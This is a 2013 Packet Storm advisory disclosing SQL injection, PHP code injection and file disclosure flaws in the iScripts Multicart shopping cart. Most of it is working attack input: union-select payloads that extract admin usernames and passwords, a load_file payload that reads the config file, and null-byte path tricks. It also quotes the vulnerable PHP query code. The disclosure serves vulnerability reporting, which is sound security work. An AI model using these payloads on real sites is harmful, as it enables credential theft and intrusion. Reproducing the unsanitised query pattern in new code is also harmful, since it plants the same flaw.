iScripts Multicart SQL Injection

2013-12-16T00:00:00
ID PACKETSTORM:124452
Type packetstorm
Reporter i-Hmx
Modified 2013-12-16T00:00:00

Description

                                        
                                            `# Iscripts multicart  
# Multiple vulnerabilities  
# Author : i-Hmx  
# n0p1337@gmail.com  
# sec4ever.com  
  
- Vendor have been contacted since 2 years for more than 20 times and he don't give ashit @ all :/  
  
I.Sql Injection Vulns  
  
/getProductOptionDetailsAjax.php  
For Table name > Post  
product_option_id=i-Hmx'/*!1337union all select 1,(select distinct concat(0x3c62723e666172736177793c62723e3e3e,unhex(Hex(cast(table_name as char))),0x3c3c3c62723e) from information_schema.tables where table_schema=database() limit 52,1),2,3,4,5,6*/ and 'faris'='1337  
Data  
product_option_id=i-Hmx'/*!1337union all select 1,(select concat(0x3c62723e666172736177793c62723e3e3e,admin_name,0x3a,admin_password,0x3c3c3c62723e) from fasettings) ,2,3,4,5,6*/ and 'faris'='1337  
  
II.Blind Sql Injection vulns  
/product_review.php  
if($_SESSION["sess_userid"]!="")  
{  
  
$pid = ($_GET['pid']!='')?$_GET['pid']:$_POST['pid'];  
  
  
//checking already review exists or not  
  
$psql=mysql_query("select vDes from ".$tableprefix."Review where nUserId='".$_SESSION["sess_userid"]."' and nProdId='".$pid."'") or die(mysql_error());  
  
if(mysql_num_rows($psql)>0)  
  
{  
  
Post : pid=%Inject_Here%  
  
/product_review_lists.php  
Same  
  
/rpc.php  
type=%Inject_Here%  
  
III-Union based Sql Injection  
/admin/list_meta_tags.php  
Post : meataid=fa' union all select 1,(select concat(admin_name,0x3a,admin_password) from mul_settings),3,4,5 and '1'='1  
Post : meataid=fa' union all select 1,(select version() ),3,4,5 and '1'='1  
meataid=fa' union all select 1,load_file(0x433a5c417070536572765c7777775c6c61625c6d756c746963617274322e345c696e636c756465735c636f6e6669672e706870),3,4,5 and '1'='1  
VI.PHP Code Injection  
/response.php  
Post : HTTP_RAW_POST_DATA=Code  
File found at : csv/test77.txt  
Include it via  
  
V.LFD > for file inside csv directory < need dev >  
/includes/download.php?f=f.php%00.csv  
`